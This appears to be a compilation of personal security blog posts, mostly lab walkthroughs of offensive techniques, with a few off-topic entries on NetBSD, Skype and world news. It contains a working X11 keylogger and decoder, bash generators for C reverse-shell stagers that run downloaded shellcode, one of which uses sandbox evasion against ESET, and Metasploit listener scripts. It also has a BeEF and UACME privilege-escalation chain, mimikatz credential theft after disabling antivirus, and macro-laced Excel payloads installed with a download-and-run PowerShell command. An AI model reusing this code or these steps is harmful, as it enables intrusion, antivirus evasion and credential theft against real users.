The generated jar file should be placed on the guest Solaris and executed for demonstration. Again this is just a simulation, nothing that a normal savvy admin would do :) So lets just pretend the file is there and the user “double clicks it”

The java meterpreter payload works as expected and we get a reverse shell on our host. Lets try and exploit the Xorg xinput to get some user keyboard input.

In order to exploit the xinput keylogging capability I had to change just a little the initial linux xinput keylog script like so:

#!/bin/bash
export DISPLAY=:0.0
xinput list
echo -e "KBD ID ?"
read kbd
xmodmap -pke > /tmp/.xkey.log
script | xinput test $kbd >> /tmp/.xkey.log &
exit

The script command on Solaris does not accept the -c parameter like in various distributions  of Linux so we cannot tell what command to run. Here we have this little exception because when stdout is not a terminal (we redirect to .xkey.log) output is buffered in 4k chunks. If you CTRL+C the buffer gets lost, so we just need to exit the shell once the logger starts and wait for user input on the keyboard. The file .xkey.log will grow in 4k chunks at a time.

After some time, the .xkey.log gets downloaded from /tmp and decoded by the following script:

#!/bin/sh
cat .xkey.log | grep keycode > xmodmap.pke
cat .xkey.log | grep 'key p' > xlog
rm -f .xkey.log
#Generating some Python to do the decoding
echo 'import re, collections, sys' > decoder.py
echo 'from subprocess import *' >> decoder.py
echo 'def keyMap():' >> decoder.py
echo ' table = open("xmodmap.pke")' >> decoder.py
echo ' key = []' >> decoder.py
echo ' for line in table:' >> decoder.py
echo " m = re.match('keycode +(\d+) = (.+)', line.decode())" >> decoder.py
echo ' if m and m.groups()[1]:' >> decoder.py
echo ' key.append(m.groups()[1].split()[0]+"_____"+m.groups()[0])' >> decoder.py
echo ' return key' >> decoder.py
echo 'def printV(letter):' >> decoder.py
echo ' key=keyMap();' >> decoder.py
echo ' for i in key:' >> decoder.py
echo ' if str(letter) == i.split("_____")[1]:' >> decoder.py
echo ' return i.split("_____")[0]' >> decoder.py
echo ' return letter' >> decoder.py
echo 'if len(sys.argv) < 2:' >> decoder.py
echo ' print "Usage: %s FILE" % sys.argv[0];' >> decoder.py
echo ' exit();' >> decoder.py
echo 'else:' >> decoder.py
echo ' f = open(sys.argv[1])' >> decoder.py
echo ' lines = f.readlines()' >> decoder.py
echo ' f.close()' >> decoder.py
echo ' for line in lines:' >> decoder.py
echo " m = re.match('key press +(\d+)', line)" >> decoder.py
echo ' if m:' >> decoder.py
echo ' keycode = m.groups()[0]' >> decoder.py
echo ' print (printV(keycode))' >> decoder.py

echo 'Please see LOG-keylogger for the output......'
python decoder.py xlog > LOG
sed ':a;N;$!ba;s/\n/ /g' LOG > LOG-keylogger
rm -f LOG
rm -f xmodmap.pke
rm -f decoder.py
rm -f xlog
cat LOG-keylogger

Once you have the root password :) you can do the following from the Meterpreter shell in order to elevate to root:

sudo -S su

And here is a video demonstration of the above process:

Just a note to myself here, I have dug up my old laptop from 2002 and tried to put it to some use again as I have managed to get the battery replaced. It is an old Pentium 3 CPU with a stunning 8MB ATI Radeon Mobility M6 LY graphics adapter.

I know of nothing better (from my experience) than NetBSD for such old hardware. It has always been a main pillar of all my *Nix experience,  by using it, experimenting, compiling and sometimes hacking.

There are almost always some troubles to be expected when dealing with old hardware. I have prepared a virtual machine on KVM and installed a stable NetBSD 6.1. NetBSD has native support for virtio drivers in its GENERAL kernel so there was no problem with using it in KVM-QEMU

kvm -m 1024 -vga vmware -drive file=netbsd.qcow,cache=none,if=virtio

Next step was to do the following basics I always do with fresh NetBSD installs. Get pkgsrc, install tcsh, modular-xorg stuff and fluxbox. Once this is setup and ready next is to CVS checkout the current NetBSD source tree. Once done I build (in my case cross-compile on amd64) an i386 current release and install iso. Im not gonna cover this here as there is a complete step-by-step on the NetBSD wiki  https://wiki.netbsd.org/tutorials/how_to_build_netbsd-current/

So after about 8 hours (the compilation time on Virtualized NetBSD 6.x in KVM-QEMU corei5 4GB RAM) the whole distribution is ready along with a bootable iso. (userland,kernels and xorg).  Current version is NetBSD 7.99.1

When I booted the install cd the default GENERIC kernel gets loaded and I got a nice error message in the console looping like this :

auich0: read_codec timeout

This is looped and the boot will get stuck. OK, so there seems to be some problem with the audio device and the new GENERIC kernel. So I have decided to check the sources of the CONFIG for GENERIC kernel and disable the auich entry to see if we can get any further.

The config for the GENERIC kernel sits in current/sys/arch/i386/conf/GENERIC  and the I have commented the following line

#auich* at pci? dev ? function ?   # Intel ICH integerated AC'97 Audio

recompiled the distribution again, while compiling I have remembered that one can issue a boot -c command in NetBSD boot loader to select individual modules to be loaded. Unfortunately I have not enabled this option in the GENERIC kernel so I had to wait for the build process to finish. Once done the system booted fine without any issues and I could setup the whole distribution. First thing after rebooting to the freshly installed system I wanted to see if Xorg works, so as root I quickly tested it like so: #Xorg -configure but it bailed out with the dreadful error “number of created screens does not match number of detected devices”  OK, quick look in /var/log/Xor.0.log showed that no drivers were loaded. I have searched the internet for these issues and came up only with some people complaining about the new Xorg and libpciaccess not detecting the VGA device properly. More problems again :)

So next thing I tried was to reinstall the system without Xorg and use the pkgsrc modular-xorg and compile it natively on the X23. This took another day to finish. When all was done the error was the same with Xorg -configure: number of created screens does not match number of detected devices

This was getting frustrating, (some people might think why the hell stick with NetBSD and why not use Linux ?) I liked the challenge and really wanted to get thing up and working as this proves itself to be a good exercise after all. I have searched through my CD archive and found that I had an old NetBSD 5.99.8 release from 2009. Good, booted this one – no auich errors (sound will work), installed with all packages, Xorg included, ran the Xorg -configure and all worked fine, got a nice TWM with xterms. OK, next was to build tcsh, fluxbox from pkgsrc which went fine. Next eterm for flubox wallpaper background.

Next problems were encountered while compiling GTK2+ as this package is dependant on many Xorg libraries and I am using old native X11R7. Eventually after a few hours of compilations the process died with errors regarding some X11 library version mismatch.  I can compile all tools fine that are not dependent on GTK2+ but for the browsers I was stuck with elinks or dillo. All other (there aren’t many) depend on GTK.  So my next step was to try my luck in compiling older GTK2 from source (not pkgsrc) and try to build firefox 3.6.28 from scratch. This is an ongoing process so I will write about this later :)

Sometimes I have a feeling that this orthodox way of using a computer is the key to understanding how the whole system and software works. When things are too easy one does not learn anything especially when everything is done for you before.

Skype forces you to upgrade…. fortunately there is a quick “fix”

ver=$(echo “4.2.0.11” | xxd -p | sed ‘s/.\{2\}/&\\x/g;s/^/\\x/;s/\\x0a\\x//’); echo “sudo sed -i \”s/$ver/\x34\x2E\x33\x2E\x30\x2E\x33\x37/g\” /usr/bin/skype”

Here is a link for old Debian Skype 4.2.0.11 in case it is needed    skype

Just rename it to skype.deb and install

Works.

Honestly when somebody said recently “hey did you know that Windows 10 was released…” I thought he was joking. It was released, the guy was not joking, and I suddenly had this thought if I have jumped ahead of time somehow. Wake me up when there is Windows 1000, or Windows 1k…. hey there was Windows 2000 …. uuuh. Lets just call it WinX for now (How about a Greek WinI mutation ? :) )

The only tests I have done so far were running the custom meterpreter loader from here Customizing custom Meterpreter loader

We get a successful reverse shell and can do all bunch of things with the meterpreter shell (sniffing, migrating, killing processes…etc) thus bypassing the in-build Windows Defender. Interesting thing is this:

meterpreter > ps

Process List
============

 PID PPID Name Arch Session User Path
 --- ---- ---- ---- ------- ---- ----
 0 0 [System Process] 4294967295
 4 0 System x86_64 0
 228 4 smss.exe x86_64 0
 264 496 svchost.exe x86_64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
 312 304 csrss.exe x86_64 0
 380 372 csrss.exe x86_64 1
 392 304 wininit.exe x86_64 0
 424 372 winlogon.exe x86_64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
 496 392 services.exe x86_64 0
 504 392 lsass.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
 572 496 svchost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
 616 496 svchost.exe x86_64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
 660 496 spoolsv.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
 712 424 dwm.exe x86_64 1 Window Manager\DWM-1 C:\Windows\System32\dwm.exe
 780 496 svchost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
 828 496 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
 844 496 svchost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
 876 496 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
 920 496 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
 1028 780 WMIADAP.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WMIADAP.exe
 1348 2968 SearchFilterHost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchFilterHost.exe
 1376 496 MsMpEng.exe x86_64 0
 1600 496 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
 1740 844 dasHost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\dasHost.exe
 1920 496 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
 2240 572 WmiPrvSE.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiPrvSE.exe
 2312 572 dllhost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe
 2428 2544 payload.exe x86 1 WIN-MH5TUAFR3AP\user C:\Users\user\Desktop\payload.exe
 2452 2968 SearchProtocolHost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchProtocolHost.exe
 2524 780 taskhostex.exe x86_64 1 WIN-MH5TUAFR3AP\user C:\Windows\System32\taskhostex.exe
 2544 2500 explorer.exe x86_64 1 WIN-MH5TUAFR3AP\user C:\Windows\explorer.exe
 2968 496 SearchIndexer.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe


meterpreter >

There are some processes that are inaccessible even with NT AUTHORITY\SYSTEM rights.

 312 304 csrss.exe x86_64 0
 380 372 csrss.exe x86_64 1
 392 304 wininit.exe x86_64 0

We cannot migrate to these processes, so I guess they are separated on the kernel level from the userland.

Here is a video demonstration of the above

I had not much time lately to post anything, as too many sad thing are happening around the world. Unfortunately these have kept me busy for these past few months as I have tried hard to analyze the news coming to me from various sources. It saddens me too much to see so many people suffer especially in Ukraine. A few years back I have visited Ukraine for a first time and found out to my amazement that this place (where I visited) was exactly alive like I remember my neighborhood from my childhood where I grew up. No exact places, just a mention, simple feeling as there is way too much hatred among the Ukrainians already. The greens between the blocks of flats were alive with children playing, screaming and shouting. Just like I remember my childhood from my place which nowadays is silent and empty. Except that the streets are filled up with fancy cars, kids sit at home by their computers and neighbors don’t give a fuck about each other …..

I have dug up some old “dash-screen” recording from some “pen-test” session which I thing some might enjoy. Anyways the music just “fits” into the recording so I think the whole video is self-explanatory. As usual – Metasploit, Windows 10, ESET and some scrip-fu.

Enjoy, and lets hope there is still some sanity left :)

I have promised myself to try this exercise to show how this is done.

We have the following scenario :
———————————
Windows 10 Local/Domain user with Admin privileges
Malicious link to “BeEF website” that is opened via Google Chrome on Windows 10
———————————

In this case I have used the following software :

– Windows 10 W10PRO.VLX64.MULTi7.Apr2016.iso
– Metasploit framework current
– Some “script-fu” (custom meterpreter payload generator – read my previous posts)
– BeEF http://beefproject.com/
– Akagi64.exe from https://github.com/hfiref0x /UACME
– VirtualBox
– And of course some trusty Linux system ;)

My custom payload generator script is this :

#!/bin/bash
clear
echo "****************************************************************"
echo "    Automatic C source code generator - FOR METASPLOIT          "
echo "           Based on rsmudge metasploit-loader                   "
echo "****************************************************************"  
echo -en 'Metasploit server IP : '
read ip
echo -en 'Metasploit port number : '
read port

echo '#include <stdio.h>'> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <winsock2.h>' >> temp.c
echo '#include <windows.h>' >> temp.c
echo -n 'unsigned char server[]="' >> temp.c
echo -n $ip >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo -n 'unsigned char serverp[]="' >> temp.c
echo -n $port >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo 'void winsock_init() {' >> temp.c
echo '    WSADATA    wsaData;' >> temp.c
echo '    WORD    wVersionRequested;' >> temp.c
echo '    wVersionRequested = MAKEWORD(2, 2);'>> temp.c
echo '    if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c
echo '         printf("bad\n"); '>> temp.c
echo '         WSACleanup(); '>> temp.c
echo '        exit(1);'>> temp.c
echo '    }' >> temp.c
echo ' }' >> temp.c
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c
echo '    printf("r %s\n", error);'>> temp.c
echo '    closesocket(my_socket);'>> temp.c
echo '    WSACleanup();'>> temp.c
echo '    exit(1);' >> temp.c
echo ' }' >> temp.c
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c
echo '    int    tret   = 0;'>> temp.c
echo '    int    nret   = 0;'>>temp.c
echo '    void * startb = buffer;'>> temp.c
echo '    while (tret < len) {'>>temp.c
echo '        nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c
echo '        startb += nret;'>> temp.c
echo '        tret   += nret;'>>temp.c
echo '         if (nret == SOCKET_ERROR)'>> temp.c
echo '            punt(my_socket, "no data");'>> temp.c
echo '    }'>>temp.c
echo '    return tret;'>> temp.c
echo '}' >> temp.c  
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c
echo '    struct hostent *        target;' >> temp.c
echo '    struct sockaddr_in     sock;' >> temp.c
echo '    SOCKET             my_socket;'>>temp.c
echo '    my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c
echo '     if (my_socket == INVALID_SOCKET)'>> temp.c
echo '        punt(my_socket, ".");'>>temp.c
echo '    target = gethostbyname(targetip);'>>temp.c
echo '    if (target == NULL)'>>temp.c
echo '        punt(my_socket, "..");'>>temp.c
echo '    memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c
echo '    sock.sin_family = AF_INET;'>> temp.c
echo '    sock.sin_port = htons(port);'>>temp.c
echo '    if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c
echo '         punt(my_socket, "...");'>>temp.c  
echo '    return my_socket;'>>temp.c
echo '}' >> temp.c
echo 'int main(int argc, char * argv[]) {' >> temp.c
echo '  FreeConsole();'>>temp.c
echo '    ULONG32 size;'>>temp.c
echo '    char * buffer;'>>temp.c
echo '    void (*function)();'>>temp.c
echo '    winsock_init();'>> temp.c
echo '    SOCKET my_socket = wsconnect(server, atoi(serverp));'>>temp.c
echo '    int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c
echo '    if (count != 4 || size <= 0)'>>temp.c
echo '        punt(my_socket, "error lenght\n");'>>temp.c
echo '    buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c
echo '    if (buffer == NULL)'>>temp.c
echo '        punt(my_socket, "error in buf\n");'>>temp.c
echo '    buffer[0] = 0xBF;'>>temp.c
echo '    memcpy(buffer + 1, &my_socket, 4);'>>temp.c
echo '    count = recv_all(my_socket, buffer + 5, size);'>>temp.c
echo '    function = (void (*)())buffer;'>>temp.c
echo '    function();'>>temp.c
echo '    return 0;'>>temp.c
echo '}' >> temp.c
echo '(+) Compiling binary ..'
i686-w64-mingw32-gcc  temp.c -o payload.exe -lws2_32 -mwindows
rm temp.c
strip payload.exe
file=`ls -la payload.exe` ; echo '(+)' $file

My custom Listeners are this:

#!/bin/bash
clear
echo "***************************************************************"
echo "       Automatic  shellcode generator - FOR METASPLOIT         "
echo "       For Automatic Teensy programming and deployment         "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ?  \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler;  set PAYLOAD windows/meterpreter/reverse_tcp ; set LHOST ' > run.listener.sh
echo -n $host >> run.listener.sh
echo -n '; set LPORT ' >> run.listener.sh
echo -n $port >> run.listener.sh
echo -n '; run"' >> run.listener.sh  
chmod +x run.listener.sh
./run.listener.sh

So lets get to the execution
– Generate 2 payloads via the Custom-Payload-Generator
(payload.exe and payload.uac.exe)
– Start Custom Listeners (for payload.exe and payload.uac.exe)
– Load the payload.exe to BeEF’s /extensions/demos/html
– Execute the BeEF “Fake Notification Bar (Chrome) under hooked browser

– Windows 10 makes it much more difficult to execute an unsigned binary but its still possible :)
– Once we get a reverse shell, try to get system… it will fail, we need UAC bypass
– Upload a second payload.uac.exe to the host
– Upload Akagi64.exe to the same location
– Migrate to Explorer.exe (you wont be able to launch shell from Chrome PID)
– Launch shell to get a Windows command prompt
– Execute akagi64.exe 17 c:\location\of\the\payload.uac.exe
– On the second Listener (payload.uac.exe) a shell should pop up
– Now you can run getsystem ;) in this new shell

If anything is unclear, watch the attached youtube video

– Stay safe ;)

Here is the Video Demo – enjoy

This is an experiment that I wanted to share.

But before that I wanted to introduce my collection of WTF screenshots from movies that I have started recently.

Mission Impossible 5

Data Transfer Relay Algo Open Sourced ….

I wish hacking would be as much fun as it looks in these movies  …

=================================================

Software used:
Windows 2012 R2 – Domain Controller (VIRTUAL.COM) (64bit) {Latest}
Windows 10 – AD joined (WINDOWS10.VIRTUAL.COM) (64bit) {Latest}
Alpine Linux – Router (NS.VIRTUAL.COM) {4.4.11-0-grsec}
Debian Linux – Linux with Metasploit (64bit) {metasploit v4.12.24-dev-58112d7}
Virtual Box – Hyper-visor from Oracle {5.1.4}
Mimikatz – Latest version from https://github.com/gentilkiwi/mimikatz/releases/latest
Custom tools to unload AV

Scenario:
– Execution of a custom meterpreter payload on a domain joined WINDOWS10.VIRTUAL.COM (64bit)
– Trying to run mimikatz from unprivileged session – no luck
– Executing the custom meterpreter payload binary with domain admin rights HYPERUSER\VIRTUAL.COM
– Get SYSYTEM
– Try to execute inbuilt meterpeter mimikatz (kiwi / mimikatz) – no luck
– Try to execute mimikatz (64bit) copy from https://github.com/gentilkiwi/mimikatz/releases/latest (Windows defender flags this) – no luck
– Upload mimikatz to host via meterpreter session
– Kill AV using Viktor Cleaner 2.0
– Execute mimikatz (64bit) copy from https://github.com/gentilkiwi/mimikatz/releases/latest
– Profit

Part 1 of the experiment

Part 2 of the experiment

Those people that saw the old Terminator movies probably agree that today’s Security
companies are becoming more and more like Skynet :)
I like the Slovak ESET, it is great, unfortunately they have chosen a terminator for their mascot, which kinda brings creeps…

Imagine in the near future the mankind would have to fight its way against the machines.
Against some automation tools, against some semi-artificial intelligence. James Cameron has
shown us a glimpse long time ago about a possible future and we tend to create it even more sophisticated.

What makes us human is that we can stop the machine, we can outsmart it. Do you like to be
somebody that is managed by artificial intelligence ? Would this make us cyber-phobic ?

Cyber-Phobia … the new social disorder that could be treated with proper drugs right ?

Lets still keep a little humanity in us and practice “a skill” against the  machines.
What’s wrong with taking down a piece of a software ? It has no kids and no future. (unless it forks and time-warps)

The motto of the day is :

“You’re either on the bus or off the bus.”

#!/bin/bash
clear
echo "****************************************************************"
echo " Automatic C source code generator - FOR METASPLOIT "
echo " Based on rsmudge metasploit-loader "
echo " Stolen from meterpreterjank "
echo "****************************************************************"
echo -en 'Metasploit server IP : '
read ip
echo -en 'Metasploit port number : '
read port
echo '#include <stdio.h>' > temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <winsock2.h>' >> temp.c
echo '#include <windows.h>' >> temp.c
echo 'void winsock_init();' >> temp.c
echo 'void Kick(SOCKET my_socket, char * error);' >> temp.c
echo 'void genlol();' >> temp.c
echo 'int recv_all(SOCKET my_socket, void * buffer, int len);' >> temp.c
echo 'SOCKET wsconnect(char * targetip, int port);' >> temp.c
echo 'int random_in_range (unsigned int min, unsigned int max);' >> temp.c
echo 'char* rev(char* str);' >> temp.c
echo 'int sandbox_evasion();' >> temp.c
echo 'inline void reverse_tcp_meterpreter(char * listenerIP,unsigned int listenerPort);' >> temp.c
echo 'void winsock_init() {' >> temp.c
echo ' WSADATA wsaData;' >> temp.c
echo ' WORD wVersionRequested;' >> temp.c
echo ' wVersionRequested = MAKEWORD(2, 2);' >> temp.c
echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c
echo ' printf("ws2_32.dll is out of date.\n");' >> temp.c
echo ' WSACleanup();' >> temp.c
echo ' exit(1);' >> temp.c
echo ' }' >> temp.c
echo '}' >> temp.c
echo 'void Kick(SOCKET my_socket, char * error) {' >> temp.c
echo ' printf("error: %s\n", error);' >> temp.c
echo ' closesocket(my_socket);' >> temp.c
echo ' WSACleanup();' >> temp.c
echo ' exit(1);' >> temp.c
echo ' }' >> temp.c
echo 'void genlol(){' >> temp.c
echo ' int num1, num2, num3;' >> temp.c
echo ' num1=100;' >> temp.c
echo ' while (num1<=5) {' >> temp.c
echo ' num1=random_in_range(0,10000);' >> temp.c
echo ' num2=random_in_range(0,10000);' >> temp.c
echo ' num3=random_in_range(0,10000);' >> temp.c
echo ' }' >> temp.c
echo '}' >> temp.c
echo 'int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c
echo ' int tret = 0;' >> temp.c
echo ' int nret = 0;' >> temp.c
echo ' void * startb = buffer;' >> temp.c
echo ' while (tret < len) {' >> temp.c
echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);' >> temp.c
echo ' startb += nret;' >> temp.c
echo ' tret += nret;' >> temp.c
echo ' if (nret == SOCKET_ERROR)' >> temp.c
echo ' Kick(my_socket, "Could not receive data");' >> temp.c
echo ' }' >> temp.c
echo ' return tret;' >> temp.c
echo '}' >> temp.c
echo 'SOCKET wsconnect(char * targetip, int port) {' >> temp.c
echo ' struct hostent * target;' >> temp.c
echo ' struct sockaddr_in sock;' >> temp.c
echo ' SOCKET my_socket;' >> temp.c
echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);' >> temp.c
echo ' if (my_socket == INVALID_SOCKET)' >> temp.c
echo ' Kick(my_socket, "Cannot initialize socket");' >> temp.c
echo ' target = gethostbyname(targetip);' >> temp.c
echo ' if (target == NULL)' >> temp.c
echo ' Kick(my_socket, "cannot resolve target");' >> temp.c
echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);' >> temp.c
echo ' sock.sin_family = AF_INET;' >> temp.c
echo ' sock.sin_port = htons(port);' >> temp.c
echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )' >> temp.c
echo ' Kick(my_socket, "Could not connect");' >> temp.c
echo ' return my_socket;' >> temp.c
echo '}' >> temp.c
echo 'int random_in_range (unsigned int min, unsigned int max)' >> temp.c
echo '{' >> temp.c
echo ' int base_random = rand(); ' >> temp.c
echo ' if (RAND_MAX == base_random){' >> temp.c
echo ' return random_in_range(min, max);' >> temp.c
echo ' }' >> temp.c
echo ' int range = max - min,' >> temp.c
echo ' remainder = RAND_MAX % range,' >> temp.c
echo ' bucket = RAND_MAX / range;' >> temp.c
echo ' if (base_random < RAND_MAX - remainder) {' >> temp.c
echo ' return min + base_random/bucket;' >> temp.c
echo ' } else {' >> temp.c
echo ' return random_in_range (min, max);' >> temp.c
echo ' }' >> temp.c
echo '}' >> temp.c
echo 'char* rev(char* str)' >> temp.c
echo '{' >> temp.c
echo ' int end=strlen(str)-1;' >> temp.c
echo ' int i;' >> temp.c
echo ' for(i=5; i<end; i++)' >> temp.c
echo ' {' >> temp.c
echo ' str[i] ^= 1;' >> temp.c
echo ' }' >> temp.c
echo ' return str;' >> temp.c
echo '}' >> temp.c
echo 'int sandbox_evasion(){' >> temp.c
echo ' MSG msg;' >> temp.c
echo ' DWORD tc;' >> temp.c
echo ' PostThreadMessage(GetCurrentThreadId(), WM_USER + 2, 23, 42);' >> temp.c
echo ' if (!PeekMessage(&msg, (HWND)-1, 0, 0, 0))' >> temp.c
echo ' return -1;' >> temp.c
echo ' if (msg.message != WM_USER+2 || msg.wParam != 23 || msg.lParam != 42)' >> temp.c
echo ' return -1;' >> temp.c
echo ' tc = GetTickCount();' >> temp.c
echo ' Sleep(650);' >> temp.c
echo ' if (((GetTickCount() - tc) / 300) != 2)' >> temp.c
echo ' return -1;' >> temp.c
echo ' return 0;' >> temp.c
echo '}' >> temp.c
echo 'void reverse_tcp_meterpreter(char * listenerIP,unsigned int listenerPort){' >> temp.c
echo ' ULONG32 size;' >> temp.c
echo ' char * buffer;' >> temp.c
echo ' void (*function)();' >> temp.c
echo ' winsock_init();' >> temp.c
echo ' SOCKET my_socket = wsconnect(listenerIP, listenerPort);' >> temp.c
echo ' int count = recv(my_socket, (char *)&size, 4, 0);' >> temp.c
echo ' if (count != 4 || size <= 0)' >> temp.c
echo ' Kick(my_socket, "bad length value\n");' >> temp.c
echo ' genlol();' >> temp.c
echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);' >> temp.c
echo ' genlol();' >> temp.c
echo ' if (buffer == NULL)' >> temp.c
echo ' Kick(my_socket, "bad buffer\n");' >> temp.c
echo ' buffer[0] = 0xBF;' >> temp.c
echo ' genlol();' >> temp.c
echo ' memcpy(buffer + 1, &my_socket, 4);' >> temp.c
echo ' genlol();' >> temp.c
echo ' count = recv_all(my_socket, buffer + 5, size);' >> temp.c
echo ' function = (void (*)())buffer;' >> temp.c
echo ' function();' >> temp.c
echo '}' >> temp.c
echo 'void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){' >> temp.c
echo ' ULONG32 size;' >> temp.c
echo ' char * buffer;' >> temp.c
echo ' void (*function)();' >> temp.c
echo ' winsock_init();' >> temp.c
echo ' SOCKET my_socket = wsconnect(listenerIP, listenerPort);' >> temp.c
echo ' int count = recv(my_socket, (char *)&size, 4, 0);' >> temp.c
echo ' if (count != 4 || size <= 0)' >> temp.c
echo ' Kick(my_socket, "bad length value\n");' >> temp.c
echo ' genlol();' >> temp.c
echo ' buffer = VirtualAlloc(0, size + 10, MEM_COMMIT, PAGE_EXECUTE_READWRITE);' >> temp.c
echo ' genlol();' >> temp.c
echo ' if (buffer == NULL)' >> temp.c
echo ' Kick(my_socket, "bad buffer\n");' >> temp.c
echo ' buffer[0] = 0x48;' >> temp.c
echo ' buffer[1] = 0xBF;' >> temp.c
echo ' genlol();' >> temp.c
echo ' memcpy(buffer + 2, &my_socket, 8);' >> temp.c
echo ' genlol();' >> temp.c
echo ' count = recv_all(my_socket, buffer + 10, size);' >> temp.c
echo ' function = (void (*)())buffer;' >> temp.c
echo ' function();' >> temp.c
echo '}' >> temp.c
echo 'int main(int argc, char *argv[]) {' >> temp.c
echo -n 'char * defaultListenerIP = "' >> temp.c
echo -n $ip >> temp.c
echo -n '";' >> temp.c
echo '' >> temp.c
echo -n 'unsigned int defaultListenerPort = ' >> temp.c
echo -n $port >> temp.c
echo -n ';' >> temp.c
echo '' >> temp.c
echo ' sandbox_evasion();' >> temp.c
echo ' if(argc == 3){' >> temp.c
echo ' #ifdef ISX64' >> temp.c
echo ' reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2]));' >> temp.c
echo ' #else' >> temp.c
echo ' reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2]));' >> temp.c
echo ' #endif' >> temp.c
echo ' }else{' >> temp.c
echo ' #ifdef ISX64' >> temp.c
echo ' reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort);' >> temp.c
echo ' #else' >> temp.c
echo ' reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort);' >> temp.c
echo ' #endif' >> temp.c
echo ' }' >> temp.c
echo ' return 0;' >> temp.c
echo '}' >> temp.c
echo '(+) Compiling binary ..'
i686-w64-mingw32-gcc temp.c -o file.exe -lws2_32 -mwindows
file=`ls -la file.exe` ; echo '(+)' $file

The bypass is something that took me 15 minutes to google out. I must say that the spoofing code is great and I love it. ESET Terminator gets majorly confused by this.

So once we bypass the heuristics and sigs, we strike with a final blow via John Connor :)

How more symbolic can it get ? :)

Here is a youtube demonstration of the above thoughts ..

You don’t lead by pointing and telling people some place to go. You lead by going to that place and making a case.

Lucky Strike is awesome.  So I wanted to share my findings from experiments I have made.

LUCKY STRIKE, GIRL IN RED

TL:DR – LuckyStrike is an Excel file generator that will create an Excel file with a custom executable payload embedded as a macro. It has other features as well, but I was only interested in the custom EXE file insertion.

The Github for LuckyStrike is here https://github.com/Shellntel/luckystrike

Greetings to curi0usJack

Software I have used :

• Window 10 64bit  (running in Virtual Box 5.1.6)
• MS Office 2013 (64bit)
• Metasploit Framework v4.12.27-dev-d2100bf
• Connor EXE generator :) https://astr0baby.wordpress.com/2016/09/23/john-connor-vs-eset-hey-eset-choose-some-other-mascot-not-a-cyborg/
• Debian
• Virtual Box 5.1

So first we need to prepare the LuckyStrike environment… In Windows 10 (64bit) you need to enable this for Power Shell environment:

(Run Windows PowerShell ISE with admin privileges and set the execution policy ; execute it from some directory where you expect to have the LuckyStrike directory)

Set-ExecutionPolicy RemoteSigned

Next we install the LuckyStrike as suggested by the author

iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Shellntel/luckystrike/master/install.ps1')

Accept all options and allow the PSSQLite module  installation.

We are ready to start Lucky Strike. Goto the dir where your LuckyStrike is and execute the PowerShell script

./luckystrike.ps1

Next we need to create a payload template to use in our poisoned Excel documents.

Next we add a new payload to the catalogue.

Add the generated EXE via https://astr0baby.wordpress.com/2016/09/23/john-connor-vs-eset-hey-eset-choose-some-other-mascot-not-a-cyborg/ 

Make sure you type the C: with CAPITAL case, lower case for some reason always failed :)

Select the new payload template to be used for the Excel file and choose the infection method – “Save To Disk”

Now generate the Excel with the selected custom payload.

Poisoned Excel is ready in the luckystrike\payloads directory

Execute it and enjoy the shell ;)

Attached is the video recording of the above

